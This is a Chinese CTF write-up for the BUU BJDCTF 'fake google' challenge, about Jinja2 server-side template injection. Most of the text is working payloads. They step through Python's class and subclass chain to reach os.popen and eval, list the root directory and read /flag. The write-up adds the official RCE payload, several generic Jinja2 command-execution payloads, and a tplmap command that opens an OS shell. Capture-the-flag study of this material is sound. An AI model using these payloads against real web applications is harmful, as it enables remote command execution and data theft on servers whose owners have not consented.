BUU BJDCTF fake google(ssti模板注入) write up 随便学习模板注入

http://39.96.86.88/2020/04/03

发现提示!，模板注入无疑了
验证一下

寻找object基类
	{{"".__class__.__bases__}}    
或	{{"".__class__.__mro__}}

找到os方法 利用object类
	{{"".__class__.__mro__[1].__subclasses__()[117]}}
	
用.init.globals查找os，init初始化类，globals全局查找方法变量参数
	{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__}}
	
利用其中的popen查找可读取文件(注意这里的斜杠表示下一级目录，加与不加是不同的路径)
	{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('dir /').read()}}
找到flag
	{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}

成功找到
	

嫌麻烦？tplmap值得你拥有。
https://github.com/epinna/tplmap
python tplmap.py -u “url+?name=” --os-shell

初学者建议手动注入，根据不同环境调试。

官方利用payload
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

大佬payload
	{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
	
1.
构造jinjia2 ssti的命令执行payload
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
2.
这里用的到Payload是一个Jinjia2模板引擎通用的RCE Payload：
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
3.
payload:看一下根目录,回显了flag在这根目录
{% for c in [].__class__.__base__.__subclasses__() %}{%if%20c.__name__=='catch_warnings'%27'%}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{%endif%}{% endfor %}
查看flag
{% for c in [].__class__.__base__.__subclasses__() %}{%if%20c.__name__=='catch_warnings'%27'%}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{%endif%}{% endfor %}

https://blog.csdn.net/SopRomeo/article/details/105123395?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522158562310619724845002506%2522%252C%2522scm%2522%253A%252220140713.130056874…%2522%257D&request_id=158562310619724845002506&biz_id=0&utm_source=distribute.pc_search_result.none-task

https://blog.csdn.net/qq_40648358/article/details/105011659?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522158562310619724845002506%2522%252C%2522scm%2522%253A%252220140713.130056874…%2522%257D&request_id=158562310619724845002506&biz_id=0&utm_source=distribute.pc_search_result.none-task

https://blog.csdn.net/qq_40827990/article/details/82940894
https://blog.csdn.net/zz_Caleb/article/details/96480967